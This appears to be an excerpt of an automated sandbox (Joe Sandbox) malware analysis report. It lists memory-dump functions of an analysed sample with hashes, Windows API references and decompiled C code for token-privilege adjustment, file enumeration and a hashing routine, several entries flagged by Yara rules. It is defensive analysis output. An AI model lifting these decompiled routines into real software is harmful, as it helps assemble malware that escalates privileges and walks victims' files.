                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
                                      • String ID:
                                      • API String ID: 573875632-0
                                      • Opcode ID: 4a2ff4e092ffcca919c3839eddcbf7ff20dd5c2f78f67d01a61a7b7652569cde
                                      • Instruction ID: d54bccfed66300b1636d6b331fc626e082994f5741dbc7ad4b427f1b61bcca4a
                                      • Opcode Fuzzy Hash: 4a2ff4e092ffcca919c3839eddcbf7ff20dd5c2f78f67d01a61a7b7652569cde
                                      • Instruction Fuzzy Hash: 3A11D3B6D00209AFCB01DFA5D8848EEBBB8EF48348F5041BAF605A2210D7759A05CBA4
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0043D609, Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 60%
                                      			E0043D609(void* __ecx, WCHAR** __edx) {
				void* _v8;
				long _v12;
				struct _LUID _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				struct _TOKEN_PRIVILEGES _v36;
				struct _TOKEN_PRIVILEGES _v52;
				WCHAR** _t33;

				asm("stosd");
				asm("xorps xmm0, xmm0");
				_v8 = 0;
				_t33 = __edx;
				asm("movlpd [ebp-0x10], xmm0");
				_v12 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(OpenProcessToken(__ecx, 0x28,  &_v8) == 0 || LookupPrivilegeValueW(0,  *_t33,  &_v20) == 0) {
					L4:
					return 0;
				} else {
					_v36.Privileges = _v20.LowPart;
					_v28 = _v20.HighPart;
					_v36.PrivilegeCount = 1;
					_v24 = 2;
					if(AdjustTokenPrivileges(_v8, 0,  &_v36, 0x10,  &_v52,  &_v12) == 0) {
						goto L4;
					}
					return 1;
				}
			}











                                      0x0043d617
                                      0x0043d61a
                                      0x0043d61d
                                      0x0043d620
                                      0x0043d622
                                      0x0043d627
                                      0x0043d62a
                                      0x0043d62b
                                      0x0043d62c
                                      0x0043d63c
                                      0x0043d688
                                      0x00000000
                                      0x0043d64f
                                      0x0043d655
                                      0x0043d65e
                                      0x0043d668
                                      0x0043d673
                                      0x0043d682
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0043d684

                                      APIs
                                      • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,00000000,?,?,?,?,?,?,?,?,0043C423), ref: 0043D634
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0043D645
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?,?,00000000,00000000), ref: 0043D67A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Token$AdjustLookupOpenPrivilegePrivilegesProcessValue
                                      • String ID:
                                      • API String ID: 658607936-0
                                      • Opcode ID: 7b5fb3b2df9bd92b2a28756da2c2aef62be0c9fe6ed9cea25315b0f21c8c7c1f
                                      • Instruction ID: 48a3eb8b21a957a68760f75adc3b3683e12e1061fea862fff1f505c96a6d5cd0
                                      • Opcode Fuzzy Hash: 7b5fb3b2df9bd92b2a28756da2c2aef62be0c9fe6ed9cea25315b0f21c8c7c1f
                                      • Instruction Fuzzy Hash: F9113A75E10219AFEB10CFA5DC859EFBBBCFB08200F00052AA901F2150E6B49A058BA0
                                      Uniqueness

                                      Uniqueness Score: 7.75%

                                      Function 00CC528C, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,00CC528B,?,00000000,?,?), ref: 00CC52AE
                                      • TerminateProcess.KERNEL32(00000000,?,00CC528B,?,00000000,?,?), ref: 00CC52B5
                                      • ExitProcess.KERNEL32 ref: 00CC52C7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: de3c27c5bdf6c8007e191fb6fad8e8312ffc71268e376f8d8d30545d6a99bc7d
                                      • Instruction ID: cc4c3ef933adbeb5f8061c2d395f845ee3f8dc764087b20f5147cbee0f7f3cb4
                                      • Opcode Fuzzy Hash: de3c27c5bdf6c8007e191fb6fad8e8312ffc71268e376f8d8d30545d6a99bc7d
                                      • Instruction Fuzzy Hash: 41E0B631401988ABCB156B65DD9DF5D3B69FB41341B044418FA0A8A131CB75EE82EA80
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 00CC879D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 113COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: cce0fb6be484fc26152d43ed1dbb53b9d42d1c0609fa71e7a5091307eae7d460
                                      • Instruction ID: 124a0aaeb4061d7c72c13788d589c205c637dafd1e958a54f5a906b131fd1dbe
                                      • Opcode Fuzzy Hash: cce0fb6be484fc26152d43ed1dbb53b9d42d1c0609fa71e7a5091307eae7d460
                                      • Instruction Fuzzy Hash: 2331E271900208AFDB24CE68CC85FFB7BADDB85354F14019CF56997251EA30AE498B90
                                      Uniqueness

                                      Uniqueness Score: 0.05%

                                      Function 00CCB840, Relevance: 3.5, APIs: 2, Instructions: 461COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 414003ae960f4cd5d2996c738a1b52f0fc48d571ea6a9649de418972638e5d02
                                      • Instruction ID: c430a5b29fdd8024c5a83da701d90a82bf5986abd6bb3d80df06eba10e4f5c87
                                      • Opcode Fuzzy Hash: 414003ae960f4cd5d2996c738a1b52f0fc48d571ea6a9649de418972638e5d02
                                      • Instruction Fuzzy Hash: 3A022B71E002199BDF14CFA9C891BADB7F5FF48314F25826ED929A7344D731AE418B90
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0043DEC5, Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 72%
                                      			E0043DEC5(void* __ecx, void* __eflags, WCHAR* _a4) {
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v56;
				struct _WIN32_FIND_DATAW _v648;
				intOrPtr _t39;
				void* _t62;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t79;

				_v20 = _v20 & 0x00000000;
				_t39 = 5;
				_t75 = __ecx;
				_v16 = _t39;
				_v24 = _t39;
				E00431815( &_v28, __eflags);
				_t62 = FindFirstFileW(_a4,  &_v648);
				_t79 = _t62 - 0xffffffff;
				while(_t79 != 0) {
					_v56 = _v56 & 0x00000000;
					__eflags = _v648.dwFileAttributes & 0x00000010;
					if((_v648.dwFileAttributes & 0x00000010) == 0) {
						_t16 =  &_v40;
						 *_t16 = _v40 & 0x00000000;
						__eflags =  *_t16;
						_v48 = _v648.nFileSizeLow;
						_v44 = _v648.nFileSizeHigh;
					} else {
						asm("xorps xmm0, xmm0");
						_v40 = 1;
						asm("movlpd [ebp-0x2c], xmm0");
					}
					E00433264( &_v56, E00433412( &_v12,  &(_v648.cFileName)));
					E00435A2D(_v12);
					_v12 = _v12 & 0x00000000;
					_t77 = _t77 - 0x18;
					_t76 = _t77;
					E0043345A(_t76,  &_v56);
					 *((intOrPtr*)(_t76 + 8)) = _v48;
					 *((intOrPtr*)(_t76 + 0xc)) = _v44;
					 *(_t76 + 0x10) = _v40;
					E00431716( &_v28);
					E00435A2D(_v56);
					__eflags = FindNextFileW(_t62,  &_v648);
				}
				E00431301(_t75, _t79,  &_v28);
				_t73 = _v28;
				if(_v28 != 0) {
					E00431A75(_t73, _t73);
				}
				E00435A2D(_a4);
				return _t75;
			}



















                                      0x0043dece
                                      0x0043ded7
                                      0x0043ded8
                                      0x0043deda
                                      0x0043dee0
                                      0x0043dee3
                                      0x0043def8
                                      0x0043defa
                                      0x0043df9c
                                      0x0043df02
                                      0x0043df06
                                      0x0043df0d
                                      0x0043df2c
                                      0x0043df2c
                                      0x0043df2c
                                      0x0043df30
                                      0x0043df33
                                      0x0043df0f
                                      0x0043df0f
                                      0x0043df12
                                      0x0043df19
                                      0x0043df19
                                      0x0043df49
                                      0x0043df51
                                      0x0043df56
                                      0x0043df5d
                                      0x0043df60
                                      0x0043df65
                                      0x0043df70
                                      0x0043df76
                                      0x0043df7c
                                      0x0043df7f
                                      0x0043df87
                                      0x0043df9a
                                      0x0043df9a
                                      0x0043dfa8
                                      0x0043dfad
                                      0x0043dfb2
                                      0x0043dfb5
                                      0x0043dfb5
                                      0x0043dfbd
                                      0x0043dfc8

                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0043DEF2
                                      • FindNextFileW.KERNEL32(00000000,00000010,00000000), ref: 0043DF94
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$FirstNext
                                      • String ID:
                                      • API String ID: 1690352074-0
                                      • Opcode ID: ea1546f00fa3f42e978d29bdd0f35372d4810a64653911d34b7a6588a61760df
                                      • Instruction ID: 347fcf938d801095227b4d456bd5fd5ac79e4067785d9f1f830ca3b2ae7cad00
                                      • Opcode Fuzzy Hash: ea1546f00fa3f42e978d29bdd0f35372d4810a64653911d34b7a6588a61760df
                                      • Instruction Fuzzy Hash: DA318F71E012099BCB10EFA5D985BEEBBF8AF48315F10516AF412B3241EB789E44CF54
                                      Uniqueness

                                      Uniqueness Score: 0.95%

                                      Function 00CCFA19, Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CCFA14,?,?,00000008,?,?,00CCF6A7,00000000), ref: 00CCFC46
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      • Opcode ID: 0f06708e5f2c46e6fc06b9e0be8cdea21513bf37c8621635dbee3d6ab4a584dd
                                      • Instruction ID: 21de27310ea7a5530a700bf7935c4ecd5206752cc288417248adf8f6c081bbf6
                                      • Opcode Fuzzy Hash: 0f06708e5f2c46e6fc06b9e0be8cdea21513bf37c8621635dbee3d6ab4a584dd
                                      • Instruction Fuzzy Hash: 42B13B316106099FD729CF28C496F647BA1FF05364F25866DE8AACF2A1C335DE82CB40
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 00CC3DFC, Relevance: 1.5, Strings: 1, Instructions: 213COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0
                                      • API String ID: 0-4108050209
                                      • Opcode ID: cbe18fcf949fa8ca6a643e9b22d618a315fa225c49b3498eb32cb0358680b79c
                                      • Instruction ID: 1483621a92544b935aa0ecc25dc0fab90dc0635efbac6e11731e1b86ff76a2ec
                                      • Opcode Fuzzy Hash: cbe18fcf949fa8ca6a643e9b22d618a315fa225c49b3498eb32cb0358680b79c
                                      • Instruction Fuzzy Hash: 8151AD31A04AC557DB3895ACF896FBF63A59B16700F18C84DF9A3CB682C710DF469352
                                      Uniqueness

                                      Uniqueness Score: 0.04%

                                      Function 00CCE793, Relevance: .1, Instructions: 105COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f5fa20e1dd23f576b419253c68e3d279101d3b698eeb1f6445727d31e87c677e
                                      • Instruction ID: fd195d0676d3e009b3d22141dc42b914e585b1dd44978c9e75c28d8e8ebc3466
                                      • Opcode Fuzzy Hash: f5fa20e1dd23f576b419253c68e3d279101d3b698eeb1f6445727d31e87c677e
                                      • Instruction Fuzzy Hash: 7E21A473F2053947770CC47E8C5227DB6E1C78C501745827AE8A6DA3C1D968D917E2E4
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 004254A9, Relevance: .1, Instructions: 93COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                      • Instruction ID: 44110b7af02148b0be507903e389a061a70ab4b9f7c3b34899126bfb2529a75b
                                      • Opcode Fuzzy Hash: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                      • Instruction Fuzzy Hash: 46316D75F00A26AFCB04CF58D4909AEF7F6FF89314B6981AAD801A7315D734E981CB84
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 00CCE666, Relevance: .1, Instructions: 86COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 74cee130f9598eabc37072ceb195ada8e56836f9e2113ca5bf38eb8312ebf743
                                      • Instruction ID: 3e0236e5f2f35cc66b6ca336405095457327c813a9ba24eeaabfe8fd61b24461
                                      • Opcode Fuzzy Hash: 74cee130f9598eabc37072ceb195ada8e56836f9e2113ca5bf38eb8312ebf743
                                      • Instruction Fuzzy Hash: 6511A763F309395B374CC56E8C9337962D1EB9C600347523EE966D62C0E464DB23D2D4
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 00410467, Relevance: .1, Instructions: 80COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                      • Instruction ID: 92e648b714a2cabb26c221812736e49a7274a1752de53181e73e1e6cc65f7c81
                                      • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                      • Instruction Fuzzy Hash: 6A31D53660434A8FC710DF18D4C0AAAB7E5FF89314F4509AEE59587312D378F9868B95
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0043F9F3, Relevance: .1, Instructions: 63COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 83%
                                      			E0043F9F3(void* __ecx, signed int __edx, signed int* _a8) {
				void* _t12;
				signed int* _t24;
				void* _t25;
				signed int _t32;
				signed int _t34;
				signed int _t41;
				signed int _t42;
				signed int _t47;
				signed int _t48;
				signed char* _t51;

				_t32 = __edx;
				asm("cdq");
				_t41 = __edx & 0x00000003;
				_t42 = 0x10ad;
				_t47 = _t41 + __edx >> 2;
				_t51 = __ecx + _t47 * 4;
				_t48 =  ~_t47;
				if(_t41 != 0) {
					do {
						asm("rol eax, 0xf");
						asm("rol eax, 0xd");
						_t42 = ( *(_t51 + _t48 * 4) * 0xcc9e2d51 * 0x1b873593 ^ _t42) * 5 - 0x19ab949c;
						_t48 = _t48 + 1;
					} while (_t48 != 0);
				}
				_t34 = 0;
				_t12 = (_t32 & 0x00000003) - 1;
				if(_t12 == 0) {
					L7:
					asm("rol eax, 0xf");
					_t42 = _t42 ^ ( *_t51 & 0x000000ff ^ _t34) * 0xcc9e2d51 * 0x1b873593;
				} else {
					_t25 = _t12 - 1;
					if(_t25 == 0) {
						L6:
						_t34 = _t34 ^ (_t51[1] & 0x000000ff) << 0x00000008;
						goto L7;
					} else {
						if(_t25 == 1) {
							_t34 = (_t51[2] & 0x000000ff) << 0x10;
							goto L6;
						}
					}
				}
				_t24 = _a8;
				 *_t24 = (((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b >> 0x0000000d ^ ((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b) * 0xc2b2ae35 >> 0x00000010 ^ (((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b >> 0x0000000d ^ ((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b) * 0xc2b2ae35;
				return _t24;
			}













                                      0x0043f9f7
                                      0x0043f9fb
                                      0x0043f9fc
                                      0x0043fa04
                                      0x0043fa09
                                      0x0043fa0c
                                      0x0043fa0f
                                      0x0043fa11
                                      0x0043fa13
                                      0x0043fa1a
                                      0x0043fa25
                                      0x0043fa2b
                                      0x0043fa31
                                      0x0043fa31
                                      0x0043fa13
                                      0x0043fa38
                                      0x0043fa3d
                                      0x0043fa40
                                      0x0043fa5c
                                      0x0043fa67
                                      0x0043fa70
                                      0x0043fa42
                                      0x0043fa42
                                      0x0043fa45
                                      0x0043fa53
                                      0x0043fa5a
                                      0x00000000
                                      0x0043fa47
                                      0x0043fa4a
                                      0x0043fa50
